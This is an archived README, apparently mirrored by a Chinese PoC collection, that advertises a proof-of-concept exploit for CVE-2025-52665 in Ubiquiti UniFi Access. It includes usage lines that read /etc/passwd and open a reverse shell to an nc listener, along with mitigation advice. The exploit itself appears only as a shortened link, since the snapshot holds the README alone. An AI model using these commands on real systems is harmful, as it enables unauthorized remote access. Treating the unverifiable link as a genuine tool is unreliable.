关联漏洞
介绍
# CVE-2025-52665
This repository contains a **proof-of-concept exploit** for **CVE-2025-52665**, an **unauthenticated API access vulnerability** in **Ubiquiti UniFi Access Application versions 3.3.22 to 3.4.31**.
The exploit leverages a **misconfiguration in the management API** that exposes critical endpoints **without authentication**, allowing **remote code execution (RCE)** on affected devices. The flaw was introduced in version 3.3.22 and remains present through 3.4.31.
---
### Usage Warning
> **This tool is for authorized penetration testing only.**
> Verify legal compliance before use.
> **Ubiquiti has patched this in 4.0.21+** — update immediately if vulnerable.
---
### Exploit Details
The vulnerability exists in the **management API** which incorrectly trusts **all requests originating from the local management network** (`192.168.0.0/16`, `10.0.0.0/8`, etc.) without validating session tokens or source IP restrictions.
A malicious actor with **access to the management VLAN** can send crafted JSON payloads to trigger system-level commands via the **diagnostic and update subsystems**.
---
### Installation
```
pip install -r requirements.txt
```
---
### Usage Examples
#### 1. Execute a single command
```
python unifi-rce.py --target http://192.168.1.100:8080 --cmd "cat /etc/passwd"
```
#### 2. Get a reverse shell
```
# Start listener
nc -lvnp 4444
# Trigger exploit
python unifi-rce.py --target http://192.168.1.100:8080 --reverse 192.168.1.200 4444
```
---
### Mitigation
- **Update to UniFi Access Application 4.0.21 or later**
- Restrict management interface to trusted IPs only
- Disable API access from untrusted networks
---
### Exploit - [href](https://tinyurl.com/4e4wdaxt)
For any inquiries, please email me at: eviedejesu803@gmail.com
文件快照
[4.0K] /data/pocs/ccad704d911ce20ccb7594d326beafc22141f27a
└── [1.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。